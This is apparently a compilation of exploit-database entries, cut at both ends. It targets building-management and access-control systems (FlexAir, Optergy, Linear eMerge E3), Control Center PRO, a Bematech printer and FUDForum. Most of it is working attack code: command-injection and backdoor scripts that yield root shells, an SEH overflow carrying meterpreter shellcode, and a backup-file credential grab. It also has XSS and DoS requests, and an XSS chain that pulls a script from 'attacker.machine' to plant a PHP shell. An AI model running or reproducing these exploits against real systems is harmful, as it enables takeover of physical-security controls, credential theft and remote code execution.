value="131" /> <input type="hidden" name="newPrivileges" value="134" /> <input type="hidden" name="newPrivileges" value="147" /> <input type="hidden" name="newPrivileges" value="25" /> <input type="hidden" name="newPrivileges" value="135" /> <input type="hidden" name="newPrivileges" value="105" /> <input type="hidden" name="newPrivileges" value="59" /> <input type="hidden" name="newPrivileges" value="142" /> <input type="hidden" name="newPrivileges" value="28" /> <input type="hidden" name="newPrivileges" value="27" /> <input type="hidden" name="newPrivileges" value="102" /> <input type="hidden" name="newPrivileges" value="31" /> <input type="hidden" name="newPrivileges" value="125" /> <input type="hidden" name="newPrivileges" value="30" /> <input type="hidden" name="newPrivileges" value="108" /> <input type="hidden" name="newPrivileges" value="129" /> <input type="hidden" name="newPrivileges" value="33" /> <input type="hidden" name="newPrivileges" value="34" /> <input type="hidden" name="newPrivileges" value="36" /> <input type="hidden" name="newPrivileges" value="37" /> <input type="hidden" name="newPrivileges" value="38" /> <input type="hidden" name="newPrivileges" value="46" /> <input type="hidden" name="newPrivileges" value="127" /> <input type="hidden" name="newPrivileges" value="41" /> <input type="hidden" name="newPrivileges" value="42" /> <input type="hidden" name="newPrivileges" value="45" /> <input type="hidden" name="newPrivileges" value="44" /> <input type="hidden" name="newPrivileges" value="49" /> <input type="hidden" name="newPrivileges" value="48" /> <input type="hidden" name="newPrivileges" value="112" /> <input type="hidden" name="newPrivileges" value="113" /> <input type="hidden" name="newPrivileges" value="117" /> <input type="hidden" name="newPrivileges" value="115" /> <input type="hidden" name="newPrivileges" value="116" /> <input type="hidden" name="newPrivileges" value="133" /> <input type="hidden" name="newPrivileges" value="51" /> <input type="hidden" name="newPrivileges" value="54" /> <input type="hidden" name="newPrivileges" value="56" /> <input type="hidden" name="newPrivileges" value="55" /> <input type="hidden" name="newPrivileges" value="66" /> <input type="hidden" name="newPrivileges" value="67" /> <input type="hidden" name="newPrivileges" value="60" /> <input type="hidden" name="newPrivileges" value="61" /> <input type="hidden" name="newPrivileges" value="62" /> <input type="hidden" name="newPrivileges" value="68" /> <input type="hidden" name="newPrivileges" value="69" /> <input type="hidden" name="newPrivileges" value="103" /> <input type="hidden" name="newPrivileges" value="104" /> <input type="hidden" name="newPrivileges" value="64" /> <input type="hidden" name="newPrivileges" value="65" /> <input type="hidden" name="newPrivileges" value="71" /> <input type="hidden" name="newPrivileges" value="121" /> <input type="hidden" name="newPrivileges" value="122" /> <input type="hidden" name="newPrivileges" value="85" /> <input type="hidden" name="newPrivileges" value="86" /> <input type="hidden" name="newPrivileges" value="74" /> <input type="hidden" name="newPrivileges" value="76" /> <input type="hidden" name="newPrivileges" value="144" /> <input type="hidden" name="newPrivileges" value="75" /> <input type="hidden" name="newPrivileges" value="77" /> <input type="hidden" name="newPrivileges" value="78" /> <input type="hidden" name="newPrivileges" value="79" /> <input type="hidden" name="newPrivileges" value="73" /> <input type="hidden" name="newPrivileges" value="143" /> <input type="hidden" name="newPrivileges" value="109" /> <input type="hidden" name="newPrivileges" value="110" /> <input type="hidden" name="newPrivileges" value="88" /> <input type="hidden" name="newPrivileges" value="89" /> <input type="hidden" name="newPrivileges" value="90" /> <input type="hidden" name="newPrivileges" value="118" /> <input type="hidden" name="newPrivileges" value="95" /> <input type="hidden" name="newPrivileges" value="93" /> <input type="hidden" name="newPrivileges" value="96" /> <input type="hidden" name="newPrivileges" value="94" /> <input type="hidden" name="newPrivileges" value="92" /> <input type="hidden" name="newPrivileges" value="98" /> <input type="hidden" name="newPrivileges" value="99" /> <input type="hidden" name="newPrivileges" value="146" /> <input type="hidden" name="newPrivileges" value="100" /> <input type="submit" value="Forgery" /> </form> </body> </html>

# Exploit Title: FlexAir Access Control 2.4.9api3 - Remote Code Execution # Google Dork: NA # Date: 2019-11-11 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/ # Software Link: https://www.computrols.com/building-automation-software/ # Version: 2.4.9api3 # Tested on: NA # CVE : CVE-2019-9189 # Advisory: https://applied-risk.com/resources/ar-2019-007 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # PoC #!/bin/bash # # Command injection with root privileges in FlexAir Access Control (Prima Systems) # Firmware version: <= 2.3.38 # # Discovered by Sipke Mellema # Updated: 14.01.2019 # ########################################################################## # # $ ./Nova2.3.38_cmd.sh 192.168.13.37 "id" # Executing: id # Output: # uid=0(root) gid=0(root) groups=0(root),10(wheel) # Removing temporary file.. # Done # ########################################################################## # Output file on the server OUTPUT_FILE="/www/pages/app/images/logos/output.txt" # Command to execute CMD="$2" # IP address IP="$1" # Change HTTP to HTTPS if required HOST="http://${IP}" # Add output file CMD_FULL="${CMD}>${OUTPUT_FILE}" # Command injection payload. Be careful with single quotes! PAYLOAD="<requests><request name='LoginUser'><param name='UsrName' value='test'/><param name='UsrEMail' value='[email protected]'/><param name='GoogleAccessToken' value='test;${CMD_FULL}'/></request></requests>" # Perform exploit echo "Executing: ${CMD}" curl --silent --output /dev/null -X POST -d "${PAYLOAD}" "${HOST}/bin/sysfcgi.fx" # Get output echo "Output:" curl -s "${HOST}/app/images/logos/output.txt" # Remove temp file echo "Removing temporary file.." PAYLOAD="<requests><request name='LoginUser'><param name='UsrName' value='test'/><param name='UsrEMail' value='[email protected]'/><param name='GoogleAccessToken' value='test;rm /www/pages/app/images/logos/output.txt'/></request></requests>" curl --silent --output /dev/null -X POST -d "${PAYLOAD}" "${HOST}/bin/sysfcgi.fx" echo "Done"

# Title: Optergy 2.3.0a - Username Disclosure # Author: LiquidWorm # Date: 2019-11-05 # Vendor: https://optergy.com/ # Product web page: https://optergy.com/products/ # Affected version: <=2.3.0a # Advisory: https://applied-risk.com/resources/ar-2019-008 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # CVE: CVE-2019-7272 # PoC: curl -s http://192.168.232.19/Login.html?showReset=true | grep 'option value=' <option value="80">djuro</option> <option value="99">teppi</option> <option value="67">view</option> <option value="3">alerton</option> <option value="59">stef</option> <option value="41">humba</option> <option value="25">drmio</option> <option value="11">de3</option> <option value="56">andri</option> <option value="6">myko</option> <option value="22">dzonka</option> <option value="76">kosto</option> <option value="8">beebee</option> <option value="1">Administrator</option>

# Exploit Title: RTK IIS Codec Service 6.4.10041.133 - 'RtkI2SCodec' Unquote Service Path # Google Dork: N/A # Date: 2019-11-11 # Exploit Author: chuyreds # Vendor Homepage:https://www.realtek.com/en/ # Software Link: https://support.hp.com/mx-es/drivers/selfservice/hp-spectre-13-4000-x360-convertible-pc/7527520/model/7835502?sku=K8N38LA # Version: 6.4.10041.133 # Tested on: Windows 10 Home Single Language # CVE : N/A # Explot-Realtek.txt #Service Info: C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ RTK IIS Codec Service RtkI2SCodec C:\Program Files\Realtek\Audio\IIS\RtkI2SAudioService64.exe Auto C:\Users\user>sc query RtkI2SCodec NOMBRE_SERVICIO: RtkI2SCodec TIPO : 10 WIN32_OWN_PROCESS ESTADO : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) CÓD_SALIDA_WIN32 : 0 (0x0) CÓD_SALIDA_SERVICIO: 0 (0x0) PUNTO_COMPROB. : 0x0 INDICACIÓN_INICIO : 0x0

# Title: Optergy 2.3.0a - Remote Code Execution # Author: LiquidWorm # Date: 2019-11-05 # Vendor: https://optergy.com/ # Product web page: https://optergy.com/products/ # Affected version: <=2.3.0a # Advisory: https://applied-risk.com/resources/ar-2019-008 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # CVE: CVE-2019-7276 # PoC: #!/usr/bin/env python # # Unauthenticated Remote Root Exploit in Optergy BMS (Console Backdoor) # # Affected version <=2.0.3a (Proton and Enterprise) # ############################################################################## # # lqwrm@metalgear:~/stuff/optergy$ python getroot.py 192.168.232.19 # Challenge received: 1547540929287 # SHA1: 56a6e5bf103591ed45faa2159cae234d04f06d93 # MD5 from SHA1: 873efc9ca9171d575623a99aeda44e31 # Answer: 56a6e5bf103591ed45faa2159cae234d04f06d93873efc9ca9171d575623a99aeda44e31 # # id # uid=0(root) gid=0(root) groups=0(root) # ############################################################################## # # import os####### import sys###### import json##### import hashlib## import requests# piton = os.path.basename(sys.argv[0]) if len(sys.argv) < 2: print '\n\x20\x20[*] Usage: '+piton+' <ip:port>\n' sys.exit() while True: challenge_url = 'http://'+sys.argv[1]+'/tools/ajax/ConsoleResult.html?get' try: req1 = requests.get(challenge_url) get_challenge = json.loads(req1.text) challenge = get_challenge['response']['message'] print 'Challenge received: ' + challenge hash_object = hashlib.sha1(challenge.encode()) print 'SHA1: '+(hash_object.hexdigest()) h1 = (hash_object.hexdigest()) hash_object = hashlib.md5(h1.encode()) print 'MD5 from SHA1: '+(hash_object.hexdigest()) h2 = (hash_object.hexdigest()) print 'Answer: '+h1+h2 zeTargets = 'http://'+sys.argv[1]+'/tools/ajax/ConsoleResult.html' zeCommand = raw_input('# ') if zeCommand.strip() == 'exit': sys.exit() zeHeaders = {'User-Agent' : 'BB/BMS-251.4ev4h', 'Accept' : '*/*', 'Accept-Encoding' : 'gzip, deflate', 'Accept-Language' : 'mk-MK,mk;q=1.7', 'Connection' : 'keep-alive', 'Connection-Type' : 'application/x-www-form-urlencoded'} zePardata = {'command' : 'sudo '+zeCommand, 'challenge' : challenge, 'answer' : h1+h2} zeRequest = requests.post(zeTargets, headers=zeHeaders, data=zePardata) get_resp = json.loads(zeRequest.text) get_answ = get_resp['response']['message'] print get_answ except Exception: print '[*] Error!' break

# Exploit Title: Adrenalin Core HCM 5.4.0 - 'ReportID' Reflected Cross-Site Scripting # Google Dork: NA # Date: 2018-09-06 # Exploit Author: Rishu Ranjan # Vendor Homepage: https://www.myadrenalin.com/ # Software Link: https://www.myadrenalin.com/core-hcm/ # Version: 5.4.0 (REQUIRED) # Tested on: NA # CVE : CVE-2018-12653 # Type: webapps # Platform: Multiple # Description # ==================== # A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in # Adrenalin Core HCM v5.4.0 HRMS Software. The user supplied input containing # malicious JavaScript is echoed back as it is in JavaScript code in an HTML # response. URL ==================== https:// <HOST:PORT>/myadrenalin/RPT/SSRSDynamicEditReports.aspx?ReportId=109LWFREPORT.RDL15822%27%3balert(%22Reflected%20XSS%22)%2f%2f773&Export=0 Parameter ==================== ReportId Attack Type ==================== Remote CVE Impact Other ==================== Allows an attacker to input malicious JavaScript which can steal cookie, redirect them to other malicious website, etc. Reference ==================== https://nvd.nist.gov/vuln/detail/CVE-2018-12653 https://www.knowcybersec.com/2019/02/CVE-2018-12653-reflected-XSS.html Discoverer ==================== Rishu Ranjan

# Exploit Title: FlexAir Access Control 2.3.35 - Authentication Bypass # Google Dork: NA # Date: 2019-11-11 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/ # Software Link: https://www.computrols.com/building-automation-software/ # Version: 2.3.35 # Tested on: NA # CVE : CVE-2019-7666, CVE-2019-7667 # Advisory: https://applied-risk.com/resources/ar-2019-007 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system #!/usr/bin/env python # -*- coding: utf8 -*- # # Prima FlexAir Access Control 2.3.35 Database Backup Predictable Name Exploit # Authentication Bypass (Login with MD5 hash) # # Older versions: /links/Nova_Config_2019-01-03.bck # Older versions: /Nova/assets/Nova_Config_2019-01-03.bck # Newer versions: /links/Nova_Config_2019-01-03_13-53.pdb3 # Fixed versions: 2.4 # ################################################################################### # # lqwrm@metalgear:~/stuff/prima$ python exploitDB.py http://192.168.230.17:8080 # [+] Please wait while fetchin the backup config file... # [+] Found some juice! # [+] Downloading: http://192.168.230.17:8080/links/Nova_Config_2019-01-07.bck # [+] Saved as: Nova_Config_2019-01-07.bck-105625.db # lqwrm@metalgear:~/stuff/prima$ sqlite3 Nova_Config_2019-01-07.bck-105625.db # SQLite version 3.22.0 2018-01-22 18:45:57 # Enter ".help" for usage hints. # sqlite> select usrloginname,usrloginpassword from users where usrid in (1,2); # superadmin|0dfcfa8cc7fd39d96ffe22dd406b5065 # sysadmin|1af01c4a5a4ec37f451a9feb20a0bbbe # sqlite> .q # lqwrm@metalgear:~/stuff/prima$ # ################################################################################### # # 11.01.2019 # import os####### import sys###### import time##### import requests# from datetime import timedelta, date from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) piton = os.path.basename(sys.argv[0]) if len(sys.argv) < 2: print '[+] Usage: '+piton+' [target]' print '[+] Target example 1: http://10.0.0.17:8080' print '[+] Target example 2: https://primanova.tld\n' sys.exit() host = sys.argv[1] def datum(start_date, end_date): for n in range(int ((end_date - start_date).days)): yield start_date + timedelta(n) start_date = date(2017, 1, 1) end_date = date(2019, 12, 30) print '[+] Please wait while fetchin the backup config file...' def spinning_cursor(): while True: for cursor in '|/-\\': yield cursor spinner = spinning_cursor() for mooshoo in datum(start_date, end_date): sys.stdout.write(next(spinner)) sys.stdout.flush() time.sleep(0.1) sys.stdout.write('\b') h = requests.get(host+'/links/Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck', verify=False) if (h.status_code) == 200: print '[+] Found some juice!' print '[+] Downloading: '+host+'/links/Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck' timestr = time.strftime('%H%M%S') time.sleep(1) open('Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck-'+timestr+'.db', 'wb').write(h.content) print '[+] Saved as: Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck-'+timestr+'.db' sys.exit() print '[-] No backup for you today. :('

# Exploit Title: Control Center PRO 6.2.9 - Local Stack Based BufferOverflow (SEH) # Date: 2019-11-09 # Exploit Author: Samir sanchez garnica @sasaga92 # Vendor Homepage: http://www.webgateinc.com/wgi/eng/products/list.php?ec_idx1=P610 # Software Link: http://www.webgateinc.com/wgi/eng/products/list.php?ec_idx1=P610&ptype=view&page=&p_idx=90&tab=download&#tabdown # Version: 6.2.9 # Tested: Windows 10 pro N and Windows XP SP3 # CVE : N/A #!/usr/bin/python ''' Existe una vulnerabilidad de desbordamiento de pila, una vez se intenta hacer uso del modulo crear usuario, en el campo username/nombre, copiando una cantidad considerable de strings, la cual no es controlada por el software y se produce una sobreescritura del SEH) ''' import sys import random import string import struct import argparse def pattern_create(_type,_length): _type = _type.split(" ") if _type[0] == "trash": return _type[1] * _length elif _type[0] == "random": return ''.join(random.choice(string.lowercase) for i in range(_length)) elif _type[0] == "pattern": _pattern = '' _parts = ['A', 'a', '0'] while len(_pattern) != _length: _pattern += _parts[len(_pattern) % 3] if len(_pattern) % 3 == 0: _parts[2] = chr(ord(_parts[2]) + 1) if _parts[2] > '9': _parts[2] = '0' _parts[1] = chr(ord(_parts[1]) + 1) if _parts[1] > 'z': _parts[1] = 'a' _parts[0] = chr(ord(_parts[0]) + 1) if _parts[0] > 'Z': _parts[0] = 'A' return _pattern else: return "Not Found" def generate_file(_name_file, _payload): print _payload print "[+] Creando Archivo malicioso" _name_file = open(_name_file,"w+") _name_file.write(_payload) _name_file.close() print "[+] Payload de {0} bytes generado, exitosamente.".format(len(_payload)) def main(): _parser = argparse.ArgumentParser() _parser.add_argument("--os", dest="os", help="introduce el os, win10, winxp", required=True) _args = _parser.parse_args() #badchars 0x0a, 0x0d, >= 0x80 _name_exploit = "ControlCenterPRO_v6_2_9.txt" #sudo ./msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -e x86/alpha_mixed EXITFUNC=seh -f c -b '\x00\x0a\x0d' BufferRegister=ESP _shellcode = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b" "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58" "\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x69\x78\x4e\x62\x37\x70" "\x43\x30\x45\x50\x31\x70\x6f\x79\x4d\x35\x46\x51\x6f\x30\x50" "\x64\x4e\x6b\x72\x70\x50\x30\x4e\x6b\x46\x32\x64\x4c\x6e\x6b" "\x71\x42\x32\x34\x6c\x4b\x61\x62\x34\x68\x66\x6f\x6e\x57\x30" "\x4a\x76\x46\x76\x51\x49\x6f\x4e\x4c\x47\x4c\x63\x51\x63\x4c" "\x75\x52\x76\x4c\x35\x70\x49\x51\x58\x4f\x54\x4d\x75\x51\x4b" "\x77\x6b\x52\x39\x62\x46\x32\x53\x67\x4c\x4b\x50\x52\x76\x70" "\x4c\x4b\x71\x5a\x77\x4c\x6e\x6b\x42\x6c\x46\x71\x32\x58\x6a" "\x43\x61\x58\x56\x61\x68\x51\x76\x31\x4c\x4b\x73\x69\x55\x70" "\x57\x71\x4b\x63\x4e\x6b\x67\x39\x66\x78\x6d\x33\x56\x5a\x32" "\x69\x6c\x4b\x35\x64\x4c\x4b\x55\x51\x6a\x76\x50\x31\x59\x6f" "\x4c\x6c\x39\x51\x58\x4f\x64\x4d\x35\x51\x5a\x67\x54\x78\x79" "\x70\x53\x45\x5a\x56\x67\x73\x71\x6d\x49\x68\x45\x6b\x73\x4d" "\x31\x34\x63\x45\x68\x64\x51\x48\x4c\x4b\x70\x58\x44\x64\x37" "\x71\x49\x43\x72\x46\x4c\x4b\x36\x6c\x52\x6b\x4e\x6b\x30\x58" "\x77\x6c\x36\x61\x4a\x73\x4e\x6b\x77\x74\x4c\x4b\x56\x61\x7a" "\x70\x6e\x69\x42\x64\x45\x74\x71\x34\x63\x6b\x61\x4b\x51\x71" "\x52\x79\x52\x7a\x72\x71\x39\x6f\x39\x70\x73\x6f\x51\x4f\x73" "\x6a\x4e\x6b\x64\x52\x58\x6b\x6c\x4d\x73\x6d\x61\x78\x55\x63" "\x77\x42\x55\x50\x67\x70\x42\x48\x73\x47\x54\x33\x36\x52\x63" "\x6f\x46\x34\x73\x58\x52\x6c\x63\x47\x44\x66\x56\x67\x69\x6f" "\x48\x55\x6d\x68\x5a\x30\x45\x51\x77\x70\x37\x70\x75\x79\x58" "\x44\x70\x54\x42\x70\x53\x58\x44\x69\x4f\x70\x30\x6b\x57\x70" "\x39\x6f\x5a\x75\x42\x4a\x34\x4b\x42\x79\x52\x70\x4d\x32\x39" "\x6d\x62\x4a\x46\x61\x32\x4a\x37\x72\x32\x48\x69\x7a\x66\x6f" "\x69\x4f\x39\x70\x4b\x4f\x4b\x65\x4e\x77\x30\x68\x47\x72\x63" "\x30\x52\x31\x33\x6c\x4e\x69\x7a\x46\x61\x7a\x56\x70\x61\x46" "\x30\x57\x75\x38\x6b\x72\x69\x4b\x44\x77\x73\x57\x79\x6f\x69" "\x45\x4d\x55\x6b\x70\x63\x45\x46\x38\x52\x77\x50\x68\x38\x37" "\x48\x69\x45\x68\x4b\x4f\x69\x6f\x59\x45\x46\x37\x52\x48\x71" "\x64\x68\x6c\x67\x4b\x39\x71\x59\x6f\x6a\x75\x52\x77\x6e\x77" "\x45\x38\x63\x45\x32\x4e\x42\x6d\x30\x61\x59\x6f\x4e\x35\x31" "\x7a\x35\x50\x30\x6a\x46\x64\x50\x56\x52\x77\x61\x78\x47\x72" "\x58\x59\x59\x58\x53\x6f\x39\x6f\x49\x45\x6b\x33\x48\x78\x63" "\x30\x73\x4e\x64\x6d\x4c\x4b\x56\x56\x53\x5a\x53\x70\x75\x38" "\x77\x70\x52\x30\x63\x30\x45\x50\x33\x66\x50\x6a\x53\x30\x51" "\x78\x70\x58\x79\x34\x31\x43\x4a\x45\x79\x6f\x4e\x35\x4e\x73" "\x56\x33\x51\x7a\x67\x70\x43\x66\x61\x43\x56\x37\x75\x38\x35" "\x52\x79\x49\x48\x48\x71\x4f\x4b\x4f\x7a\x75\x6e\x63\x6b\x48" "\x77\x70\x51\x6e\x76\x67\x36\x61\x39\x53\x74\x69\x6b\x76\x44" "\x35\x78\x69\x7a\x63\x6f\x4b\x59\x6e\x76\x6e\x30\x32\x6b\x5a" "\x61\x7a\x33\x30\x56\x33\x39\x6f\x78\x55\x63\x5a\x65\x50\x79" "\x53\x41\x41") _offset = 664 _padding = 40000 _nseh = "\x42\x42\x77\x08" _seh = struct.pack("<L", 0x637c1571) #0x0258107E pop edi # pop esi # retn lib_VoiceEngine_dll32.dll 3 8 one-reg, stack edi, esi nonull, ascii if _args.os.lower() == "win10": _esp_prepend = "\x54\x58\x66\x05\x34\x18\x50\x5C" _inject = pattern_create("trash A",_offset) _inject += _nseh _inject += _seh _inject += "A" * 4 _inject += _esp_prepend _inject += _shellcode _inject += pattern_create("trash D",_padding-len(_inject)) elif _args.os.lower() == "winxp": _esp_prepend = "\x54\x58\x66\x05\x7C\x0C\x50\x5C" _inject = pattern_create("trash A",_offset) _inject += _nseh _inject += _seh _inject += "A" * 4 _inject += _esp_prepend _inject += "A" * 16 _inject += _shellcode _inject += pattern_create("trash D",_padding-len(_inject)) else: print("[-] os select is not support, select win10 or winxp") generate_file(_name_exploit, _inject) if __name__ == "__main__": main()

# Exploit Title: Wondershare Application Framework Service - "WsAppService" Unquote Service Path # Google Dork: N/A # Date: 2019-11-11 # Exploit Author: chuyreds # Vendor Homepage: https://www.wondershare.com/ # Software Link: https://www.wondershare.com/drfone/ # Version: 2.4.3.231 # Tested on: Windows 10 Home Single Language # CVE : N/A #Service Info: C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ Wondershare Application Framework Service WsAppService C:\Program Files (x86)\Wondershare\WAF\2.4.3.231\WsAppService.exe Auto C:\Users\user>sc query WsAppService NOMBRE_SERVICIO: WsAppService TIPO : 10 WIN32_OWN_PROCESS ESTADO : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) CÓD_SALIDA_WIN32 : 0 (0x0) CÓD_SALIDA_SERVICIO: 0 (0x0) PUNTO_COMPROB. : 0x0 INDICACIÓN_INICIO : 0x0

# Exploit Title: Bematech Printer MP-4200 - Denial of Service # Date: 2019-11-11 # Exploit Author: Jonatas Fil # Vendor Homepage: https://www.bematech.com.br/ # Software Link: https://www.bematech.com.br/produto/mp-4200-th/ # Version: MP-4200 TH # Tested on: Windows and Linux # CVE : N/A DoS Poc: -------------------------------------------------------------------------------------------------------- POST /en/conf_admin.html HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,pt;q=0.8 Cache-Control: max-age=0 Referer: http://TARGET/en/conf_admin.html Content-Length: 40 Content-Type: application/x-www-form-urlencoded admin=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&person=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&SUBMIT_ADMIN=Submit -------------------------------------------------------------------------------------------------------- XSS Poc: -------------------------------------------------------------------------------------------------------- POST /en/conf_admin.html HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,pt;q=0.8 Cache-Control: max-age=0 Referer: http://printer.com/en/conf_admin.html Content-Length: 40 Content-Type: application/x-www-form-urlencoded admin=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&person=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&SUBMIT_ADMIN=Submit

# Title: Linear eMerge E3 1.00-06 - Remote Code Execution # Author: LiquidWorm # Date: 2019-11-13 # Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/ # Software Link: http://linear-solutions.com/nsc_family/e3-series/ # Affected version: <=2.3.0a # Advisory: https://applied-risk.com/resources/ar-2019-005 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # CVE: CVE-2019-7256 #!/usr/bin/env python # # Linear eMerge E3 Unauthenticated Command Injection Remote Root Exploit # Affected version: <=1.00-06 # via card_scan_decoder.php # CVE: CVE-2019-7256 # Advisory: https://applied-risk.com/resources/ar-2019-005 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # # By Gjoko 'LiquidWorm' Krstic # ######################################################################### # lqwrm@metalgear:~/stuff$ python emergeroot2.py 192.168.1.2 # Do you want me to try and get the web front-end credentials? (y/n) y # ID='admin',Password='MakeLoveNotWar!' # # [email protected]:/spider/web/webroot$ id # uid=1003(lighttpd) gid=0(root) # # [email protected]:/spider/web/webroot$ cat /etc/version # Software Version: 1.00.03 # Image: nxgcpub-image # Built by: jenkins # # [email protected]:/spider/web/webroot$ echo davestyle |su -c id # Password: # uid=0(root) gid=0(root) groups=0(root) # # [email protected]:/spider/web/webroot$ exit # # [+] Erasing read stage file and exiting... # [+] Done. Ba-bye! # ######################################################################### import requests import time#### import sys##### import os###### import re###### piton = os.path.basename(sys.argv[0]) if len(sys.argv) < 2: print ''' ..... .e$$$$$$$$$$$$$$e. z$$ ^$$$$$$$$$$$$$$$$$. .$$$* J$$$$$$$$$$$$$$$$$$$e .$" .$$$$$$$$$$$$$$$$$$$$$$*- .$ $$$$$$$$$$$$$$$$***$$ .ee" z**$$ $$r ^**$$$$$$$$$*" .e$$$$$$*" " -\e$$ 4$$$$. .ze$$$"""" 4 z$$$$$ $$$$$$$$$$$$$$$$$$$$" $$$$$$$$ .$$$$$$$$$$$**$$$$*" z$$" $$ $$$$P*"" J$*$$c $$" $$F .$$$ $$ ^$$ $$ *$$c.z$$$ $$ $$ $P $$$$$$$ 4$F 4$ dP *$$$" $$ '$r .$ J$" $" $ $P 4$ F $$ 4$ 4$% 4$ $$ 4$ d$" $$ $P $$ $$ $$ 4$% $$ $$ $$ d$ $$ $F "3 r=4e=" ... ..rf . ""% $**$*"^""=..^4*=4=^"" ^""" ''' print '\n\x20\x20[+] Linear eMerge E3 Remote Root Exploit' print '\x20\x20[-] by lqwrm (c) 2019' print '\n\x20\x20[*] Usage: '+piton+' <ipaddress:port>\n' sys.exit() ipaddr = sys.argv[1] creds = raw_input('Do you want me to try and get the web front-end credentials? (y/n) ') if creds.strip() == 'y': frontend = '''grep "Controller" /tmp/SpiderDB/Spider.db |cut -f 5,6 -d ',' |grep ID''' requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&door=%60'+frontend+' > test.txt%60') showme = requests.get('http://'+ipaddr+'/test.txt') print showme.text while True: try: cmd = raw_input('lighttpd@'+ipaddr+':/spider/web/webroot$ ') execute = requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&door=%60'+cmd+' > test.txt%60') #time.sleep(1); readreq = requests.get('http://'+ipaddr+'/test.txt') print readreq.text if cmd.strip() == 'exit': print "[+] Erasing read stage file and exiting..." requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&ReaderNo=%60rm test.txt%60') print "[+] Done. Ba-bye!\n" break else: continue except Exception: break sys.exit()

# Exploit Title : FUDForum 3.0.9 - Remote Code Execution # Date: 2019-10-26 # Exploit Author: liquidsky (JMcPeters) # Vulnerable Software: FUDForum 3.0.9 # Vendor Homepage: https://sourceforge.net/projects/fudforum/ # Version: 3.0.9 # Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum_3.0.9.zip/download # Tested On: Windows / mysql / apache # Author Site: https://github.com/fuzzlove/FUDforum-XSS-RCE # Demo: https://youtu.be/0gsJQ82TXw4 | https://youtu.be/fR8hVK1paks # CVE: CVE-2019-18873 // Greetz : wetw0rk, Fr13ndz, offsec =) // // Description: Multiple Stored XSS vulnerabilities have been found in FUDforum 3.0.9 that may result in remote code execution. // The areas impacted are the admin panel and the forum. // // XSS via username in Forum: // 1. Register an account and log in to the forum. // 2. Go to the user control panel. -> Account Settings -> change login // 3. Insert javascript payload <script/src="http://attacker.machine/fud.js"></script> // 4. When the admin visits the user information the payload will fire, uploading a php shell on the remote system. // // XSS via user-agent in Admin Panel: // 1. Register an account and log in to the forum. If you have an IP already associated with a registered user this is not required. This step is so when you run the XSS payload from your attacker machine it gets logged under the user activity. // 2. Send the XSS payload below (from an IP associated with an account) / host the script: // 3. curl -A '<script src="http://attacker.machine/fud.js"></script>' http://target.machine/fudforum/index.php // 4. When the admin visits the user information from the admin controls / User Manager the payload will fire under "Recent sessions", uploading a php shell on the remote system. // function patience() { var u=setTimeout("grabShell()",5000); } // This function is to call the reverse shell php script (liquidsky.php). // currently using a powershell payload that will need to be modified. function grabShell() { var url 